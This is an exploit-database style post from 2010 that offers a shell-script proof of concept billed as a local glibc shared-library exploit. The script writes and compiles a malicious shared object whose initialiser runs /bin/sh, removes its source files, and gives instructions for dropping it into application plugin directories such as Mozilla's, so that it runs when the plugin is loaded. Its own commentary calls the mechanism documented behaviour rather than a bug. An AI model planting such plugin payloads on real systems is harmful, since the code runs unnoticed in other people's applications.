Local Glibc shared library (.so) <= 2.11.1 exploit
Source: Rh0@z1p.biz  Author: Rh0  Published: 2010-04-08

# Exploit Title: Local Glibc shared library (.so) exploit
# Date: 07.04.10
# Author: Rh0 (Rh0@z1p.biz)
# Software Link: NA
# Version: <= 2.11.1, higher not tested
# Tested on: Debian stable (x86-64), Ubuntu 9.10 (x86), Fedora 12 (x86)
# CVE : NA
# Code :

#!/bin/sh

# Many Linux applications load their plugins as shared libraries, e.g.
# Mozilla, Geany IDE, Compiz, the Epiphany web browser and others. A
# plugin is often loaded during startup, when the user opens something
# like "->Tools->Plugins" in the menu, or at the latest when it is
# activated. The loading is done with dlopen(), which is part of glibc.
# See http://linux.die.net/man/3/dlopen.
# dlopen() always runs the library's initialisation routine (_init, the
# DT_INIT entry) as soon as the object is mapped, before the caller has
# looked up a single symbol. This is documented behaviour, not a glibc
# bug. A malformed _init makes dlopen() crash (NULL dereference), but
# that is not even needed to exploit an application: a custom _init is
# executed unconditionally whenever the object is dlopen()ed. The payload
# can be a freshly compiled .so dropped into a plugin directory the user
# can write to, or the _init of a plugin already shipped with the
# application can be overwritten with working shellcode (or with some
# \x41 bytes just to crash it). Any application that loads plugins from
# a user-writable directory therefore executes whatever is placed there.

# PoC:

cat >Xlibx.c<<EOF

#include <unistd.h>

/* Evil initialiser: dlopen() runs _init as soon as the object is mapped. */
void _init(void)
{
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
}
EOF

gcc -fPIC -c Xlibx.c
# link with ld directly: "gcc -shared" would pull in crti.o, which already
# defines _init, and the link would fail with a duplicate symbol
ld -shared -soname Xlibx -o Xlibx.so -lc Xlibx.o
rm Xlibx.c
rm Xlibx.o

echo "* copy Xlibx.so to an appropriate plugin directory, e.g.:"
echo "* Mozilla: ~/.mozilla/plugins/ "
echo "* firefox->Edit->Preferences => Exploit "

